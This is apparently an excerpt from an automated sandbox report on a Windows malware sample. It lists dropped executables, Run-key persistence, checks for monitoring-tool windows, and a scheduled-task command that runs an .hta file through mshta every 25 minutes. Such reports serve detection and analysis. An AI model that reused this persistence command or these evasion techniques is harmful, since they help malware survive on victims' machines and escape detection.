Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_uuid.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10106670101\48dbed8457.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\python3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SvhQA35[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\psutil\_psutil_windows.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\zstandard\backend_c.pyd	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zY9sqWs[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10106470101\zY9sqWs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\charset_normalizer\md__mypyc.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\pythoncom312.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	File created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\zstandard\_cffi.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\websockets\speedups.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10106740101\f5042cb50f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\win32api.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\pywintypes312.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	File created: C:\Users\user\AppData\Roaming\Local\Caches\08oGp67f\Anubis.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\vcruntime140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\charset_normalizer\md.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10102370101\SvhQA35.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\_elementtree.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe

File created: C:\Users\user\AppData\Roaming\Local\Caches\installed.txt

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Anubis
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 48dbed8457.exe

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempIVNFFFPTEDHNGUMJJMGLE0XIHZ75TX8D.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\10106720101\df7baf8347.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn pVyKUmahmLu /tr "mshta C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta" /sc minute /mo 25 /ru "user" /f

Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE

File created: C:\Windows\Tasks\rapes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 48dbed8457.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 48dbed8457.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Anubis
Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Anubis

Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00A8F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00A8F98E
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00B01C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00B01C41

Source: C:\Users\user\Desktop\5c9465cda4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5c9465cda4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
